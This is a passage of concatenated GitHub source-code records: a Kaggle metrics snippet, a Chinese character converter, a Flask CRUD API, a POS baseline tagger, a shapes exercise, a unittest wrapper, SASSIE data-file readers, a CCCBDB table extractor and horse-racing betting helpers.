topic_title, topic_description, y = self.obtain_tensor_values2(600)\n\n y_pred = self((content_title, content_description, topic_title, topic_description))\n\n for m in self.full_metrics:\n m.update_state(y, y_pred)\n\n content_title, content_description, topic_title, topic_description, y = self.obtain_test_values(600)\n\n y_pred = self((content_title, content_description, topic_title, topic_description))\n\n for m in self.test_metrics:\n m.update_state(y, y_pred)\n self.num_step += 1\n # Return a dict mapping metric names to current value\n return {**{m.name: m.result() for m in self.metrics}, **{m.name: m.result() for m in self.full_metrics},\n **{m.name: m.result() for m in self.test_metrics}}\"\"\"\n\n @property\n def metrics(self):\n return [self.accuracy, self.precision, self.recall, self.entropy]\n\n @property\n def test_metrics(self):\n return [self.test_precision, self.test_recall]\n\n @property\n def full_metrics(self):\n return [self.full_accuracy, self.full_precision, self.full_recall]","repo_name":"louis845/KaggleLearningEquality2023","sub_path":"model_vectorizer_simple.py","file_name":"model_vectorizer_simple.py","file_ext":"py","file_size_in_byte":7837,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"21395551660","text":"# -*- coding: utf-8 -*-\n\n# maximized match\ndef conv(string,dic):\n i = 0\n while i < len(string):\n for j in range(len(string) - i, 0, -1):\n if string[i:][:j] in dic:\n t = dic[string[i:][:j]]\n string = string[:i] + t + string[i:][j:]\n i += len(t) - 1\n break\n i += 1\n return string\n \n# generate dict\ndef mdic(): \n table = open('ZhConversion.php','r').readlines()\n dic = dict()\n name = []\n for line in table:\n if line[0] == '$':\n #print line.split()[0][1:]\n name.append(dic)\n dic = dict()\n if line[0] == \"'\":\n word = line.split(\"'\")\n dic[word[1]] = word[3]\n name[3].update(name[1]) # SC to TC: zh2Hant + zh2TW\n name[4].update(name[1]) # SC to TC: zh2Hant + zh2HK\n name[5].update(name[2]) # TC to SC: zh2Hans + zh2CN\n return name[3],name[4],name[5]\n \n\ndef main():\n resultfile = open('ExtractedSimplifiedChineseCharacters.txt','wa')\n with open('TabDilimitedCSV.csv','r') as f:\n for line in f:\n simplifiedstr = line.split('\\t')[4] #change this index to the one corresponding to CSV columns\n resultfile.write(conv(simplifiedstr,dic_CN)+'\\n')\n newf.close\n\nif __name__==\"__main__\":\n\n [dic_TW,dic_HK,dic_CN] = mdic()\n main()\n","repo_name":"LS2002/cn-character-converter","sub_path":"converter.py","file_name":"converter.py","file_ext":"py","file_size_in_byte":1347,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"12904483361","text":"import datetime\nimport json\n\nfrom flask import Flask, request, jsonify\nfrom flask_sqlalchemy import SQLAlchemy\nfrom models import *\n\napp = Flask(__name__)\n\napp.config['SQLALCHEMY_DATABASE_URI'] = \"sqlite:///data/database.db\"\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\napp.config[\"JSON_AS_ASCII\"] = False\napp.config[\"JSON_SORT_KEYS\"] = False\n\ndb = SQLAlchemy(app)\n\n\n@app.route(\"/users\", methods=[\"GET\", \"POST\"])\ndef users():\n if request.method == \"GET\":\n user_data = db.session.query(User).all()\n return jsonify([user.to_dict() for user in user_data])\n elif request.method == \"POST\":\n try:\n user = json.loads(request.data)\n new_user_obj = User(\n id=user[\"id\"],\n first_name=user[\"first_name\"],\n last_name=user[\"last_name\"],\n age=user[\"age\"],\n email=user[\"email\"],\n role=user[\"role\"],\n phone=user[\"phone\"]\n )\n with db.session.begin():\n db.session.add(new_user_obj)\n return \"Пользователь создан в базе данных\", 200\n except Exception as e:\n print(e)\n\n\n@app.route(\"/users/\", methods=[\"GET\", \"PUT\", \"DELETE\"])\ndef user_one(user_id):\n if request.method == \"GET\":\n user_data = db.session.query(User).get(user_id)\n if user_data is None:\n return \"Не найдено\"\n else:\n return jsonify(user_data.to_dict())\n elif request.method == \"PUT\":\n with db.session.begin():\n user_data = json.loads(request.data)\n user = db.session.query(User).get(user_id)\n if user is None:\n return \"Пользователь не найден!\", 404\n user.first_name = user_data[\"first_name\"]\n user.last_name = user_data[\"last_name\"]\n user.age = user_data[\"age\"]\n user.email = user_data[\"email\"]\n user.role = user_data[\"role\"]\n user.phone = user_data[\"phone\"]\n\n db.session.add(user)\n return f\"Пользователь с id {user_id} успешно изменён!\", 200\n elif request.method == \"DELETE\":\n with db.session.begin():\n user = db.session.query(User).get(user_id)\n if user is None:\n return \"Пользователь не найден!\", 404\n\n db.session.delete(user)\n return f\"Пользователь с id {user_id} успешно удалён!\", 200\n\n\n@app.route(\"/orders\", methods=[\"GET\", \"POST\"])\ndef orders():\n if request.method == \"GET\":\n order_data = db.session.query(Order).all()\n return jsonify([order.to_dict() for order in order_data])\n elif request.method == \"POST\":\n try:\n order = json.loads(request.data)\n month_start, day_start, year_start = [int(_) for _ in order['start_date'].split(\"/\")]\n month_end, day_end, year_end = [int(_) for _ in order['end_date'].split(\"/\")]\n new_order_obj = Order(\n id=order[\"id\"],\n name=order[\"name\"],\n description=order[\"description\"],\n start_date=datetime.date(month=month_start, day=day_start, year=year_start),\n end_date=datetime.date(month=month_end, day=day_end, year=year_end),\n address=order[\"address\"],\n price=order[\"price\"],\n customer_id=order[\"customer_id\"],\n executor_id=order[\"executor_id\"]\n )\n with db.session.begin():\n db.session.add(new_order_obj)\n return \"Заказ создан в базе данных\", 200\n except Exception as e:\n print(e)\n\n\n@app.route(\"/orders/\", methods=[\"GET\", \"PUT\", \"DELETE\"])\ndef order_one(order_id):\n if request.method == \"GET\":\n order_data = db.session.query(Order).get(order_id)\n if order_data is None:\n return \"Не найдено\"\n else:\n return jsonify(order_data.to_dict())\n elif request.method == \"PUT\":\n with db.session.begin():\n order_data = json.loads(request.data)\n order = db.session.query(Order).get(order_id)\n month_start, day_start, year_start = [int(_) for _ in order_data['start_date'].split(\"/\")]\n month_end, day_end, year_end = [int(_) for _ in order_data['end_date'].split(\"/\")]\n if order is None:\n return \"Заказ не найден!\", 404\n order.name = order_data[\"name\"]\n order.description = order_data[\"description\"]\n order.start_date = datetime.date(month=month_start, day=day_start, year=year_start)\n order.end_date = datetime.date(month=month_end, day=day_end, year=year_end)\n order.address = order_data[\"address\"]\n order.price = order_data[\"price\"]\n order.customer_id = order_data[\"customer_id\"]\n order.executor_id = order_data[\"executor_id\"]\n\n db.session.add(order)\n return f\"Заказ с id {order_id} успешно изменён!\", 200\n elif request.method == \"DELETE\":\n with db.session.begin():\n order = db.session.query(Order).get(order_id)\n if order is None:\n return \"Заказ не найден!\", 404\n\n db.session.delete(order)\n return f\"Заказ с id {order_id} успешно удалён!\", 200\n\n\n@app.route(\"/offers\", methods=[\"GET\", \"POST\"])\ndef offers():\n if request.method == \"GET\":\n offer_data = db.session.query(Offer).all()\n return jsonify([offer.to_dict() for offer in offer_data])\n elif request.method == \"POST\":\n try:\n offer = json.loads(request.data)\n new_offer_obj = Offer(\n id=offer[\"id\"],\n order_id=offer[\"order_id\"],\n executor_id=offer[\"executor_id\"]\n )\n with db.session.begin():\n db.session.add(new_offer_obj)\n return \"Предложение создано в базе данных\", 200\n except Exception as e:\n print(e)\n\n\n@app.route(\"/offers/\", methods=[\"GET\", \"PUT\", \"DELETE\"])\ndef offer_one(offer_id):\n if request.method == \"GET\":\n offer_data = db.session.query(Offer).get(offer_id)\n if offer_data is None:\n return \"Не найдено\"\n else:\n return jsonify(offer_data.to_dict())\n elif request.method == \"PUT\":\n with db.session.begin():\n offer_data = json.loads(request.data)\n offer = db.session.query(Offer).get(offer_id)\n if offer is None:\n return \"Предложение не найдено!\", 404\n offer.order_id = offer_data[\"order_id\"]\n offer.executor_id = offer_data[\"executor_id\"]\n\n db.session.add(offer)\n return f\"Предложение с id {offer_id} успешно изменёно!\", 200\n elif request.method == \"DELETE\":\n with db.session.begin():\n offer = db.session.query(Offer).get(offer_id)\n if offer is None:\n return \"Предложение не найдено!\", 404\n\n db.session.delete(offer)\n return f\"Предложение с id {offer_id} успешно удалёно!\", 200\n\n\nif __name__ == \"__main__\":\n app.run(debug=True)\n","repo_name":"Grislii/HW16","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":7521,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"18943729727","text":"from collections import defaultdict, Counter\n\n\nclass BaselineTagger:\n\n def __init__(self, tagged_sents):\n \"\"\"\n tagged_sents -- training sentences, each one being a list of pairs.\n \"\"\"\n self.voc = set()\n self.set_of_tags = set()\n self.tag_freq = Counter()\n self.most_freq_tag_by_word = defaultdict(str)\n tagsby_word = defaultdict(lambda: Counter())\n\n for sent in tagged_sents:\n for word, tag in sent:\n self.voc.add(word)\n self.set_of_tags.add(tag)\n self.tag_freq[tag] += 1\n tagsby_word[word][tag] += 1\n\n for w, tag_dict in tagsby_word.items():\n self.most_freq_tag_by_word[w] = tag_dict.most_common(1)[0][0]\n\n self.most_freq_tag = self.tag_freq.most_common(1)[0][0]\n\n def tagset(self):\n \"\"\"Returns the set of tags.\n \"\"\"\n return self.set_of_tags\n\n def unknown(self, w):\n \"\"\"Check if a word is unknown for the model.\n\n w -- the word.\n \"\"\"\n return w not in self.voc\n\n def tag_word(self, w):\n \"\"\"Tag a word.\n\n w -- the word.\n \"\"\"\n tag = None\n\n if self.unknown(w):\n tag = self.most_freq_tag\n else:\n tag = self.most_freq_tag_by_word[w]\n\n return tag\n\n def tag(self, sent):\n \"\"\"Tag a sentence.\n\n sent -- the sentence.\n \"\"\"\n tagging = [self.tag_word(w) for w in sent]\n return tagging\n","repo_name":"acapello/PLN-2015","sub_path":"tagging/baseline.py","file_name":"baseline.py","file_ext":"py","file_size_in_byte":1502,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"72"} +{"seq_id":"27067266106","text":"#!/usr/bin/python3\n\"\"\"\n2.1 Shapes\n\nBuild a class hierarchy for a primitive graphic editor figures data model.\nTwo basic entities of a graphic editor are a Color and a Coordinates which are building blocks for all other entities.\nCoordinates can be defined in several ways (Linear, Cyllindric, Spheric) through static methods.\nA conversion logic between them is out of scope for this task,\nfor simplicity just store a coordinates type in a field.\n\nThere are several basic shapes:\na Point, a Line, a Circle, a Rectangle, and a Triangle - each defined by a different combination of\nColor and Coordinates. A line can have a Pattern consisting of a list of (Color, length) tuples;\nmore complex shapes can be filled with a Color or not (be transparent) and each their border can still have a Pattern.\n\nWithin a course of this task no other methods than are necessary to create objects are required.\n\"\"\"\n\n\nclass Color(object):\n pass\n\navailable_types = [\"Linear\", \"Cyllindric\", \"Spheric\"]\n\n\nclass Coordinate(object):\n type = \"Linear\"\n\n @staticmethod\n def set_coordinate(input_type):\n if input_type in available_types:\n Coordinate.type = input_type\n\n\nclass Point(object):\n\n def __init__(self, color, center):\n self.color = color\n self.center = center\n\n\nclass Line(object):\n\n def __init__(self, color, start, end):\n self.color = color\n self.start = start\n self.end = end\n\n\nclass Circle(Point):\n\n def __init__(self, color, center, radius):\n super().__init__(color, center)\n self.radius = radius\n\n\nclass Rectangle(object):\n\n def __init__(self, top, bottom, left, right):\n self.top = top\n self.bottom = bottom\n self.left = left\n self.right = right\n\n\nclass Triangle(object):\n\n def __init__(self, first, second, third):\n self.first = first\n self.second = second\n self.third = third\n\n","repo_name":"mstepovanyy/python-training","sub_path":"course/lesson10/task01/shapes.py","file_name":"shapes.py","file_ext":"py","file_size_in_byte":1913,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"20429481201","text":"import inspect\nimport re\nimport unittest\nimport unittest.case as case\nfrom functools import wraps, partial\n\n# TODO use the logger object\n# TODO tell the Helpers to increase the exit status in case of failure\n# (through the logger) ?\n\n_print = partial(print, flush=True)\n\n\ndef addSuccess(method):\n \"\"\"Decorator to wrap TestCase methods by calling writeResult\"\"\"\n\n @wraps(method)\n def wrapper(inst, *args, **kwds):\n \"\"\"wrapper\"\"\"\n # move 'msg' arguments from args to kwds if it exists\n sig = inspect.signature(method)\n args = list(args)\n for i, para in enumerate(sig.parameters):\n if i >= len(args):\n break\n if para == \"msg\":\n kwds[\"msg\"] = args.pop(i)\n try:\n ret = method(inst, *args, **kwds)\n except AssertionError as exc:\n ret = None\n inst.writeResult(False, method.__name__, kwds.get(\"msg\"), str(exc))\n else:\n inst.writeResult(True, method.__name__, kwds.get(\"msg\"))\n return ret\n\n return wrapper\n\n\ndef where(level=3):\n \"\"\"Return the filename/line number where the test is called.\n\n Arguments:\n level (Optional[int]): Number of frames to rewind to find the\n caller. Defaults to 3 (1: *here*, 2: *write_xxx*, 3: *assertXxx*).\n\n Returns:\n (str, int): Filename and line number.\n \"\"\"\n filename, line_no = \"not_found\", 0\n caller = inspect.currentframe()\n try:\n for _ in range(level):\n if not caller.f_back:\n break\n caller = caller.f_back\n filename = caller.f_code.co_filename\n line_no = caller.f_lineno\n finally:\n pass\n return f\"{filename}#{line_no}\"\n\n\nclass AssertRaisesContext(case._AssertRaisesContext):\n \"\"\"Wrap Context of TestCase object\"\"\"\n\n def __init__(self, expected, test_case, expected_regexp=None):\n self.writeResult = test_case.writeResult\n # these two lines already exist in __exit__ in python >= 2.7.9\n if isinstance(expected_regexp, str):\n expected_regexp = re.compile(expected_regexp)\n super().__init__(expected, test_case, expected_regexp)\n\n def __exit__(self, exc_type, exc_value, tb):\n comment = \"\"\n try:\n ret = super().__exit__(exc_type, exc_value, tb)\n if not ret:\n try:\n exc_name = exc_type.__name__\n except AttributeError:\n exc_name = str(exc_type)\n raise AssertionError(\"unexpected exception raised: \" \"{0}\".format(exc_name))\n except AssertionError as exc:\n ret = False\n comment = str(exc)\n self.writeResult(ret, self.expected.__name__, comment)\n # never fail\n return True\n\n\nclass TestCase(unittest.TestCase):\n \"\"\"Similar to a unittest.TestCase\n Does not fail but print result OK/NOOK in the .resu file\"\"\"\n\n def __init__(self, methodName=\"runTest\", silent=False):\n \"\"\"Initialization\"\"\"\n self._silent = silent\n self._passed = 0\n self._failure = 0\n self._last_ok = True\n super().__init__(\"runTest\")\n\n @property\n def last_failed(self):\n \"\"\"bool: Tell if the last test failed.\"\"\"\n return not self._last_ok\n\n def runTest(self):\n \"\"\"does nothing\"\"\"\n pass\n\n def printSummary(self):\n \"\"\"Print a summary of the tests\"\"\"\n _print((\"-\" * 70))\n count = self._passed + self._failure\n _print(\n (\"Ran {0} tests, {1} passed, {2} in failure\".format(count, self._passed, self._failure))\n )\n if self._failure:\n _print(\"\\nNOOK\\n\")\n else:\n _print(\"\\n OK \\n\")\n\n def writeResult(self, ok, funcTest, msg, exc=None):\n \"\"\"Write a message in the result file\"\"\"\n if self._silent:\n return\n exc = exc or \"\"\n msg = msg or \"\"\n s1 = \" : \" if exc else \"\"\n s2 = \" : \" if msg else \"\"\n here = where()\n self._last_ok = ok\n if ok:\n self._passed += 1\n fmt = \" OK {func:>16} passed{s2}{msg}\"\n else:\n self._failure += 1\n fmt = \"NOOK {func:>16} failed{s1}{exc} - {here}\"\n _print(fmt.format(func=funcTest, msg=msg, exc=exc, s1=s1, s2=s2, here=here))\n\n # just use a derivated context class\n def assertRaises(self, excClass, callableObj=None, *args, **kwargs):\n \"\"\"Fail unless an exception of class excClass is raised\"\"\"\n context = AssertRaisesContext(excClass, self)\n if callableObj is None:\n return context\n with context:\n callableObj(*args, **kwargs)\n\n def assertRaisesRegex(\n self, expected_exception, expected_regexp, callable_obj=None, *args, **kwargs\n ):\n \"\"\"Asserts that the message in a raised exception matches a regexp.\"\"\"\n context = AssertRaisesContext(expected_exception, self, expected_regexp)\n if callable_obj is None:\n return context\n with context:\n callable_obj(*args, **kwargs)\n\n\ndef _add_assert_methods(cls):\n for meth in [\n \"assertAlmostEqual\",\n \"assertCountEqual\",\n \"assertDictContainsSubset\",\n \"assertDictEqual\",\n \"assertEqual\",\n \"assertFalse\",\n \"assertGreater\",\n \"assertGreaterEqual\",\n \"assertIn\",\n \"assertIs\",\n \"assertIsInstance\",\n \"assertIsNone\",\n \"assertIsNot\",\n \"assertIsNotNone\",\n \"assertLess\",\n \"assertLessEqual\",\n \"assertMultiLineEqual\",\n \"assertNotAlmostEqual\",\n \"assertNotEqual\",\n \"assertNotIn\",\n \"assertNotIsInstance\",\n \"assertNotRegex\",\n \"assertRegex\",\n \"assertSequenceEqual\",\n \"assertSetEqual\",\n \"assertTrue\",\n \"assertTupleEqual\",\n ]:\n setattr(cls, meth, addSuccess(getattr(unittest.TestCase, meth)))\n\n\n_add_assert_methods(TestCase)\ndel _add_assert_methods\n","repo_name":"Krande/code-aster-copy","sub_path":"code_aster/Utilities/Tester.py","file_name":"Tester.py","file_ext":"py","file_size_in_byte":6006,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"12136533993","text":"import os\nimport glob\nimport numpy\nimport locale\nimport string\n\nDEBUG = True\n\nif DEBUG:\n pass\n# debug_number_of_files = 100\n# debug_number_of_files = 500\n# debug_number_of_files = 10000\n\n#TODO: need to make sure API on file reading is followed exactly\n#TODO: need to have a policy for lines in data file that should be okay to skip\n#TODO: need to look at UTF-8 encoding \n#TODO: need to handle new-line / carriage return \n#TODO: need example MSDOS/WINDOWS file example as a test case\n\n#TODO: all the above should be captured in an API ; perhaps sassie-wide file reader with options\n\n#TODO: these same file reading & testing methods should be used by the filter for this module\n\ndef validate_data(other_self):\n\n mvars = other_self.mvars\n evars = other_self.evars\n log = other_self.log\n pgui = other_self.run_utils.print_gui \n\n if DEBUG:\n pgui('in validate_data')\n\n log.debug('q_data = ' + numpy.array2string(evars.q_data))\n log.debug('goal_q_data = ' + numpy.array2string(evars.goal_q_data))\n log.debug('goal_iq_data = ' + numpy.array2string(evars.goal_iq_data))\n log.debug('goal_iq_error_data = ' + numpy.array2string(evars.goal_iq_error_data))\n\n #TODO: use something like this to create an error: q_data[0] = 3.3333\n #TODO: all of this should be handled in filter\n\n #check that q-arrays of theoretical and experimental data are identical\n\n if evars.q_data.all() != evars.goal_q_data.all():\n pgui(\"q-values in theoretical files do not agree with those in experimental data file\")\n\n #check lengths of theoretical arrays: number of frames\n \n #TODO: not tested for failure\n if evars.iq_data.shape != evars.iq_error_data.shape:\n pgui(\"number of theoretical iq values does not match theoretical iq error values\")\n\n # check that the number of data points match\n \n #TODO: not tested for failure\n if evars.iq_data.shape[1] != evars.goal_q_data.shape[0]:\n pgui(\"number of theoretical iq values does not match the number of experimental q-values\")\n pgui(\"evars.iq_data.shape[1] = \"+str(evars.iq_data.shape[1]))\n pgui(\"evars.goal_q_data.shape[0] = \"+str(evars.goal_q_data.shape[0]))\n\n #TODO: not tested for failure\n if evars.iq_error_data.shape[1] != evars.goal_q_data.shape[0]:\n pgui(\"number of theoretical iq error values does not match the number of experimental q-values\")\n pgui(\"evars.iq_error_data.shape[1] = \"+str(evars.iq_error_data.shape[1]))\n pgui(\"evars.goal_q_data.shape[0] = \"+str(evars.goal_q_data.shape[0]))\n\n #TODO: not tested for failure\n if evars.goal_iq_data.shape[0] != evars.goal_q_data.shape[0]:\n pgui(\"number of experimental iq values does not match the number of experimental q-values\")\n pgui(\"evars.goal_iq_data.shape[0] = \"+str(evars.goal_iq_data.shape[0]))\n pgui(\"evars.goal_q_data.shape[0] = \"+str(evars.goal_q_data.shape[0]))\n\n #TODO: not tested for failure\n if evars.goal_iq_error_data.shape[0] != evars.goal_q_data.shape[0]:\n pgui(\"number of experimental iq error values does not match the number of experimental q-values\")\n pgui(\"evars.goal_iq_error_data.shape[0] = \"+str(evars.goal_iq_error_data.shape[0]))\n pgui(\"evars.goal_q_data.shape[0] = \"+str(evars.goal_q_data.shape[0]))\n\n\n return\n\ndef read_goal_iq_data(other_self):\n\n mvars = other_self.mvars\n evars = other_self.evars\n log = other_self.log\n pgui = other_self.run_utils.print_gui \n\n this_q = []\n this_iq = []\n this_iq_error = []\n with open(mvars.goal_iq_data_file) as this_file:\n for line in this_file: \n my_line = string.split(line)\n this_q.append(locale.atof(my_line[0]))\n this_iq.append(locale.atof(my_line[1]))\n this_iq_error.append(locale.atof(my_line[2]))\n\n this_q = numpy.array(this_q, numpy.float)\n this_iq = numpy.array(this_iq, numpy.float)\n this_iq_error = numpy.array(this_iq_error, numpy.float)\n\n evars.goal_q_data = this_q\n evars.goal_iq_data = this_iq\n evars.goal_iq_error_data = this_iq_error\n\n return \n\ndef read_iq_data(other_self):\n mvars = other_self.mvars\n evars = other_self.evars\n log = other_self.log\n pgui = other_self.run_utils.print_gui \n\n if DEBUG:\n pgui(\"DEBUG MODE\")\n pgui(\"DEBUG MODE\")\n pgui(\"DEBUG MODE\")\n\n first = True\n\n evars.number_iq_files = 0\n\n for name in glob.glob(os.path.join(mvars.iq_data_path, '*.iq')): \n evars.number_iq_files += 1\n pgui('evars.number_iq_files = ' + str(evars.number_iq_files))\n\n if mvars.number_of_files_to_use < evars.number_iq_files:\n log.debug(\"fewer files found than requested number of files by user\")\n evars.number_iq_files = mvars.number_of_files_to_use\n if mvars.number_of_files_to_use > evars.number_iq_files:\n log.error(\"more files requested by user than found\")\n\n count = 0\n\n for name in glob.glob(os.path.join(mvars.iq_data_path, '*.iq')): \n\n this_q = []\n this_iq = []\n this_iq_error = []\n with open(name) as this_file:\n for line in this_file: \n my_line = string.split(line)\n this_q.append(locale.atof(my_line[0]))\n this_iq.append(locale.atof(my_line[1]))\n this_iq_error.append(locale.atof(my_line[2]))\n\n this_q = numpy.array(this_q, numpy.float)\n this_iq = numpy.array(this_iq, numpy.float)\n this_iq_error = numpy.array(this_iq_error, numpy.float)\n \n if first:\n\n if DEBUG:\n debug_number_of_files = mvars.number_of_files_to_use\n q_data = numpy.zeros(len(this_q), numpy.float)\n iq_data = numpy.zeros((debug_number_of_files,len(this_q)), numpy.float)\n iq_data = numpy.zeros((debug_number_of_files,len(this_q)), numpy.float)\n iq_error_data = numpy.zeros((debug_number_of_files,len(this_q)), numpy.float)\n else:\n q_data = numpy.zeros(len(this_q), numpy.float)\n iq_data = numpy.zeros((mvars.number_of_files_to_use, len(this_q)), numpy.float)\n iq_error_data = numpy.zeros((mvars.number_of_files_to_use, len(this_q)), numpy.float)\n\n q_data = this_q\n first = False \n \n iq_data[count,:] = this_iq\n iq_error_data[count,:] = this_iq_error\n\n if count > 0:\n #test if all q-values are identical\n #if(count == 3):\n # this_q[0] = 3.0\n if this_q.all() != last_q.all():\n pgui('q-values do not agree for file: '+name+'\\nSTOPPING PROGRAM\\n')\n log.error('q-values do not agree for file: '+name+'\\nSTOPPING PROGRAM\\n')\n pgui('this_q = ' + str(this_q))\n log.error('this_q = ' + str(this_q))\n pgui('last_q = ' + str(last_q))\n log.error('last_q = ' + str(last_q))\n return False\n\n last_q = this_q\n \n count += 1\n if(count > (debug_number_of_files - 1) and DEBUG):\n log.debug('q_data TEST final q = ' + numpy.array2string(q_data[-1]))\n log.debug('iq_data TEST final q = ' + numpy.array2string(iq_data[count-1,-1]))\n log.debug('iq_error_data TEST final q = ' + numpy.array2string(iq_error_data[count-1,-1]))\n evars.q_data = q_data\n evars.iq_data = iq_data\n evars.iq_error_data = iq_error_data\n evars.number_iq_files = debug_number_of_files\n\n return \n\n evars.q_data = q_data\n evars.iq_data = iq_data\n evars.iq_error_data = iq_error_data\n\n return \n","repo_name":"ehb54/nmrsuite","sub_path":"sassie_modifications/analyze/eros/file_utils.py","file_name":"file_utils.py","file_ext":"py","file_size_in_byte":7707,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"6314733872","text":"from table_parser import HTMLTableParser\r\n\r\n\r\ndef simple(list):\r\n results = []\r\n p = HTMLTableParser()\r\n p.feed(str(list))\r\n for row in p.tables[0]:\r\n detail = {\r\n 'level': row[0][0],\r\n 'bond': row[1][0],\r\n 'url': 'http://cccbdb.nist.gov/' + row[1][1] if len(row[1]) > 1 else ''\r\n }\r\n results.append(detail)\r\n return results\r\n\r\n\r\ndef complex(list):\r\n results = []\r\n p = HTMLTableParser()\r\n p.feed(str(list))\r\n headers = p.tables[0][0]\r\n # remove first 2 blank columns from header row\r\n del headers[0]\r\n del headers[0]\r\n for row in p.tables[0]:\r\n # only lines with a level\r\n if len(row[0]) > 0:\r\n level = row[0][0]\r\n for index, bond in enumerate(row):\r\n # only bond that have content\r\n if len(bond) == 2:\r\n detail = {\r\n 'level': level,\r\n 'basis': headers[index-1][0],\r\n 'bond': bond[0],\r\n 'url': 'http://cccbdb.nist.gov/' + bond[1]\r\n }\r\n results.append(detail)\r\n return results\r\n","repo_name":"marcelo-mason/cccbdb-calculation-parser","sub_path":"extract.py","file_name":"extract.py","file_ext":"py","file_size_in_byte":1189,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"72"} +{"seq_id":"24036044893","text":"import random\nimport keras\nimport joblib\nimport pandas as pd\nimport numpy as np\nimport tensorflow as tf\nimport sklearn.preprocessing as preprocessing\nimport matplotlib.pyplot as plt\n\nnp.random.seed(1)\nrandom.seed(2)\n\ndef how_many_do_we_win(y_pred_value,y_real_value,df):\n \"\"\"\n Return how many do we win and the mean values of the win odds\n \"\"\"\n win_amount = 0\n List_odds = []\n for i in range(len(y_pred_value)):\n if y_pred_value[i] == y_real_value[i]:\n val = df.win_odds[:][y_pred_value[i]+1].tolist()[i] #+1 because we need horse_no and not indices from a list\n win_amount = win_amount + val\n List_odds.append(val)\n return win_amount, np.mean(List_odds)\n\ndef draw_evolution(df):\n \"\"\"\n Draw the evolution according to the date\n \"\"\"\n plt.figure(figsize=(10,10)).suptitle('Evolution of the profit with a $100 bet', fontsize=20)\n plt.ylabel('profit', fontsize=18)\n plt.xlabel('date', fontsize=16)\n plt.xticks(rotation=90)\n plt.plot(df.date, df.cumul_100)\n\ndef draw_evolution_race(df,model_name):\n \"\"\"\n Draw the evolution according to the number of races\n \"\"\"\n plt.figure(figsize=(10,10)).suptitle(f'Evolution of the profit with $100 for {model_name}', fontsize=20)\n plt.ylabel('profit ($)', fontsize=18)\n plt.xlabel('num bets', fontsize=16)\n plt.xticks(rotation=0,fontsize=15)\n plt.yticks(rotation=0,fontsize=15)\n plt.plot(df.index, df.cumul_100) \n\ndef create_X_TEST(df_init):\n \"\"\"\n return a simplified dataframe used to retrieve win_odds and place_odds to calcul profit\n \"\"\"\n INDEX = ['race_id', 'date', 'race_no', 'venue', 'config', 'surface', 'distance', 'going', 'horse_ratings', 'prize', 'race_class']\n features = ['draw','place_odds','win_odds','result']\n return df_init[INDEX + features]\n\ndef create_x_and_y(df):\n \"\"\"\n function which return 2 dataframe for the features and labels used for trainning and testing\n \"\"\"\n data = df\n X = data[data.columns[:-14]] \n ss = preprocessing.StandardScaler()\n X = pd.DataFrame(ss.fit_transform(X),columns = X.columns)\n y = data[data.columns[-14:]].applymap(lambda x: 1.0 if x == 1 else 0.0) \n\n return X, y\n\ndef prepare_and_split_data_placed(X_train_init,X_test_init):\n \"\"\"\n this function do the data prepartion then split and give us the good datasets according to the months we are trainning\n \"\"\"\n X_train = remove_place_odds_non_available(X_train_init)\n X_test = remove_place_odds_non_available(X_test_init)\n\n X_train = hm_runners(X_train)\n X_test = hm_runners(X_test)\n\n X_train = create_label(X_train)\n X_test = create_label(X_test)\n\n cols_to_drop = ['race_id','race_no','hm_runners','date','won','place']\n X_tr = X_train.drop(cols_to_drop,axis=1,level=0)\n X_te = X_test.drop(cols_to_drop,axis=1,level=0)\n\n L = []\n for col in X_tr.columns.tolist():\n L.append(col[0])\n\n X_train, y_train = create_x_and_y(X_tr)\n print(\"shape of the x_train: \", X_train.shape)\n print(\"shape of the y_train: \", y_train.shape)\n \n if X_te.shape[0] == 0 :\n print(\"They are no values available\")\n return False\n else :\n X_test, y_test = create_x_and_y(X_te)\n print(\"shape of the X_test: \", X_test.shape)\n print(\"shape of the y_test: \", y_test.shape)\n\n #compute y_train_value : show the winner for each races\n y_test_value = y_test.values.tolist()\n y_test_value = np.array([np.argmax(t) for t in y_test_value])\n \n #compute y_test_value\n y_train_value = y_train.values.tolist()\n y_train_value = np.array([np.argmax(t) for t in y_train_value])\n\n return X_train, y_train, X_test, y_test, y_train_value, y_test_value, X_test_init\n\ndef remove_place_odds_non_available(df):\n \"\"\"\n This function return a df with only race where place odds are available for all horses\n \"\"\"\n df['test'] = np.where((df['draw'] == 0).astype(int).sum(axis=1) == (df['place_odds'] == 0).astype(int).sum(axis=1), 1,0) #1 is good and 0 need to be removed\n df = df[df['test']==1].copy()\n df.drop('test',axis=1, level = 0, inplace=True)\n return df\n\ndef hm_runners(df):\n \"\"\"\n return a df with a new columns with the number of placed horses needed\n \"\"\"\n nb_of_vacant_position = (df['draw'] == 0).astype(int).sum(axis=1)\n df.insert(loc = 0, column = 'hm_runners', value = 14 - nb_of_vacant_position)\n return df\n\ndef to_3_value(pred,real,df,match_race_id_from_indices):\n \"\"\"\n return 3 or 2 values for prediction and real value for placed horses depending on the numbers of runners\n \"\"\"\n #compute real values\n arr = real\n real = [ar.argsort()[-3:][::-1]+1 if np.count_nonzero(ar==0)==11 else ar.argsort()[-2:][::-1]+1 for ar in arr]\n\n #compute prediciton values\n result = []\n arr = pred\n for i in range(len(arr)):\n res = arr[i].argsort()[:][::-1]+1\n k = []\n val = 0\n for j in range(len(res)):\n val_seuil = len(real[i])\n\n if (get_place_odds(df,match_race_id_from_indices[i],res[j])!=0 and val < val_seuil) :\n val = val + 1\n k.append(res[j])\n\n result.append(k)\n\n return real, result\n\n\ndef get_place_odds(df,race_id,horse_no):\n \"\"\"\n Return the place_odds for a race_id and a horse_no\n \"\"\"\n A = df[df['race_id']==race_id]['place_odds'].iloc[0][horse_no-1]\n # we could put a condition if the value does not exist and return 1 by default but we prefer discard bets when this happens\n return A \n\ndef 